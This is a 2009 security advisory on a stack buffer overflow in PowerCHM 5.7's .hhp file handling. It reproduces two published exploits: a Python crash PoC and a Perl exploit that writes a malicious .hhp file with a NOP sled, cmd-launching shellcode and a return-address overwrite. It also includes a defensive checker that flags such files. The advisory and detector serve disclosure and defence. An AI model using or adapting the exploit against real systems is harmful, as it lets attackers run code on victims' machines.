Written by Le Duc Anh, Bkis
Monday, 30 March 2009 22:15
PowerCHM '.HHP' File Stack Buffer Overflow Vulnerability
Bugtraq ID: 34263
Class: Boundary Condition Error
CVE:
Remote: Yes
Local: No
Published: Mar 26 2009 12:00AM
Updated: Mar 30 2009 04:46PM
Credit: Le Duc Anh, Bkis
Vulnerable: Dawningsoft PowerCHM 5.7
Discussion: PowerCHM is prone to a stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.
Successfully exploiting this issue may allow remote attackers to execute arbitrary code in the context of the application. Failed exploit attempts will cause denial-of-service conditions.
PowerCHM 5.7 is vulnerable; other versions may also be affected.
Exploit(s)/PoC(s): To exploit this issue, an attacker must entice an unsuspecting user to open a malicious file using the affected application.
Exploits are available:
===============================================================
34263.py
^^^^^^^^^
# exploit.py
# PowerCHM 5.7 (hhp file) Stack overflow PoC
# By:Encrypt3d.M!nd
#
# Originally Discovered by:
# Biks Security (http://security.biks.vn/?p=365)
#

# Minimal .hhp project header; the overflow data is appended after [INFOTYPES]
header = (
    "[OPTIONS]\n"
    "Compatibility=1.1 or later\n"
    "Compiled file=bratax.chm\n"
    "Contents file=aaaaaa.hhc\n"
    "Index file=aaaaaa.hhk\n"
    "Language=0x813 Dutch (Belgium)\n"
    "Title=\n"
    "Error log file=Errlog.txt\n"
    "Default Window=main\n\n"
    "[WINDOWS]\n"
    'main="","aaaaaa.hhc","aaaaaa.hhk","","",,,,,0x41520,240,0x184E,[262,184,762,584] ,,,,0,0,0,0\n\n'
    "[FILES]\n\n"
    "[INFOTYPES]\n"
)

file = open('poc.hhp', 'w')
file.write(header + "\x41" * 999 + "\x42\x42\x42\x42" + "\x43" * 500)
file.close()

# milw0rm.com [2009-03-27]
===============================================================
34263.pl
^^^^^^^^^
#!/usr/bin/perl
#
# Title: PowerCHM 5.7 (hhp) Local Buffer Overflow Exploit
#
# Summary: With PowerCHM you can create your CHM files
# automatically from Html Files (including .htm, .html
# and .mht), Text Files (.txt), Microsoft Word Documents
# (.doc) and Adobe Acrobat Document (.pdf).
#
# Product web page: http://www.dawningsoft.com/products/powerchm.htm
#
# Tested on WinXP Pro SP2 (English)
#
# Refs: http://www.milw0rm.com/exploits/8300
# http://security.biks.vn/?p=365
#
# Exploit by Gjoko 'LiquidWorm' Krstic
#
# liquidworm gmail com
#
# http://www.zeroscience.org/
#
# 28.03.2009
#

# .hhp project header (string content unchanged from the published exploit)
my $header =
    " [OPTIONS]\n" .
    " Compatibility=1.1 or later\n" .
    " Compiled file=zero.chm\n" .
    " Contents file=science.hhc\n" .
    " Index file=lqwrm.hhk\n" .
    " Binary Index=Yes\n" .
    " Language=0x042F\n" .
    " Title=\n" .
    " Error log file=Errlog.txt\n" .
    " Default Window=main\n\n" .
    " [WINDOWS]\n" .
    " main='',science.hhc,lqwrm.hhk,'','',,,,,0x41520,240,0x184E,[262,184,762,584] ,,,,0,0,0,0\n\n" .
    " [FILES]\n\n" .
    " [INFOTYPES]\n ";

# shellcode
my $sc = "\x8B\xEC\x33\xFF\x57\xC6\x45\xFC\x63\xC6\x45" .
         "\xFD\x6D\xC6\x45\xFE\x64\xC6\x45\xF8\x01\x8D" .
         "\x45\xFC\x50\xB8\xC7\x93\xBF\x77\xFF\xD0";

# overflow buffer: NOP sled, shellcode, filler, return address, trailing filler
my $bof = "\x90" x 568 . "$sc" . "\x41" x 400 . "\xe8\xed\x12\x00" . "\x42" x 500;

my $file = "Watchmen.hhp";
open (hhp, ">./$file") || die "\nCan't open $file: $!";
print hhp "$header" . "$bof";
close (hhp);
sleep 1;
print "\nFile $file successfully created!\n";
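Both PoCs above share one shape: a normal .hhp project header followed by a single line of hundreds of filler bytes, a fake return address and more filler. A defender can flag such files before they reach the vulnerable parser. The following checker is an added example written for this page, not code from the advisory or from either exploit author; the 512-byte line limit, the 64-byte repeat threshold and the sample project files are assumptions constructed for illustration.

```python
import re
import string

MAX_LINE = 512   # assumed upper bound for a legitimate .hhp line; tune per corpus
PRINTABLE = frozenset(string.printable.encode("ascii"))

def hhp_findings(data: bytes, max_line: int = MAX_LINE):
    """Return [(line_no, reason), ...] for lines of an .hhp blob that look
    like overflow filler rather than project settings."""
    findings = []
    for no, line in enumerate(data.split(b"\n"), start=1):
        if len(line) > max_line:
            findings.append((no, f"line length {len(line)} exceeds {max_line}"))
        bad = sum(1 for b in line if b not in PRINTABLE)
        if bad:
            findings.append((no, f"{bad} non-printable byte(s)"))
        # Long run of one repeated byte (padding such as 'A'*999 or a NOP
        # sled), which a hand-written project file never contains.
        m = re.search(rb"(.)\1{63,}", line)
        if m:
            findings.append((no, f"run of {len(m.group(0))} x 0x{m.group(1)[0]:02x}"))
    return findings

def scan_hhp(path: str):
    """Scan one .hhp file on disk; an empty list means nothing suspicious."""
    with open(path, "rb") as fh:
        return hhp_findings(fh.read())

# Constructed samples: a plausible benign project, and the same header with the
# trailer shape used by the PoCs (999 filler bytes, 4-byte slot, 500 more).
BENIGN = (b"[OPTIONS]\nCompatibility=1.1 or later\nCompiled file=help.chm\n"
          b"Title=Manual\n\n[WINDOWS]\n"
          b'main="","help.hhc","help.hhk","","",,,,,0x41520,240,0x184E,'
          b"[262,184,762,584],,,,0,0,0,0\n\n[FILES]\n\n[INFOTYPES]\n")
SUSPECT = BENIGN + b"A" * 999 + b"BBBB" + b"C" * 500

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, hhp_findings(blob) or "clean")
```

Run it over an inbound-file quarantine directory with scan_hhp(); any finding on a file that claims to be a plain project description is a reason to hold it rather than open it in PowerCHM 5.7.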
Solution: Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at:
References:
- PowerCHM Homepage http://www.dawningsoft.com/products/powerchm.ht (Dawningsoft)
- [Bkis-05-2009] PowerCHM Stack-based Buffer Overflow http://www.securityfocus.com/archive/1/50220 (Bkis)